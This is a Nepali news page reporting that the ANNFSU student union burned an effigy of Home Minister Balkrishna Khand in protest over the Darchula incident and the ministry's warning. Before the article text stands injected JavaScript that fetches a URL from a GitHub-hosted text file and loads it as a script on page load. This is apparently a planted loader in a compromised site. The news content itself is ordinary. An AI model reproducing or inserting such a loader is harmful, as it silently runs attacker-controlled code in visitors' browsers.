;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपा (एस)निकट अनेरास्ववियूद्वारा गृहमन्त्रीको पुत्ला दहन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेकपा (एस)निकट अनेरास्ववियूद्वारा गृहमन्त्रीको पुत्ला दहन
Breaking News

नेकपा (एस)निकट अनेरास्ववियूद्वारा गृहमन्त्रीको पुत्ला दहन

जुनेली न्यूज , काठमाण्डौ | माधवकुमार नेतृत्वको नेकपा एकीकृत समाजवादीको विद्यार्थी संगठन अनेरास्ववियूले गृहमन्त्री बालकृष्ण खाँडको पुत्ला दहन गरेको छ ।

दार्चुलामा नेपाली युवक तुइनबाट महाकालीमा खसेको विषयलाई लिएर गरेको विरोध प्रदर्शनबारे गृह मन्त्रालयले विज्ञप्ति जारी गरेर आपत्ति जनाएको विरोधमा अनेरास्ववियूले गृह मन्त्रीको पुत्ला जलाएको हो ।

अनेरास्ववियूले मीनभवनस्थित नेपाल कमर्स क्याम्पसको बाहिर गृहमन्त्रीको पुत्ला दहनसहित प्रदर्शन गरेको हो । अनेरास्ववियूले दार्चुला घटनाको विषयलाई लिएर भारतीय प्रधानमन्त्री नरेन्द्र मोदीको पुत्ला जलाएको थियो ।

तर गृह मन्त्रालयले आइतबार विज्ञप्ति निकालेर छिमेकी देशको प्रधानमन्त्रीविरुद्ध प्रदर्शन नगर्न चेतावनी दिएको थियो ।।

 

फेसबुक प्रतिक्रियाहरु